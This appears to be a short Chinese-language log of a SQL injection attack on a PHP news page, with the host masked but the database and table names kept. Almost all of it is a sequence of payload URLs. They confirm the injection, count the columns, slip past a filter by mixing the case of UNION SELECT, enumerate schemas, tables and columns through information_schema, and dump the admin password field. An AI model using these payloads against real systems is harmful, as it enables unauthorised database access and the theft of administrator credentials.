http://xxx.com/news_blank.php?id=296 and 1=1
http://xxxxx.com/news_blank.php?id=296+and+1=1
http://xxxx.com/news_blank.php?id=296+and+1=2
確認是注入
http://xxxx.com/news_blank.php?id=296 order by 11 正確 http://xxxx.com/news_blank.php?id=296 order by 12 錯誤
http://xxxx.com/news_blank.php?id=296 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 攔截
http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11--+
成功繞過
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11--+
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2
獲取數據庫名
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11 from information_schema.tables where table_schema='hengdong' limit 0,1
查詢表名
由於表名太多 所以用python寫了個腳本
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11 from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4
查詢字段名
http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,version(),9,10,11 from hdwl_admin
查詢字段的內容
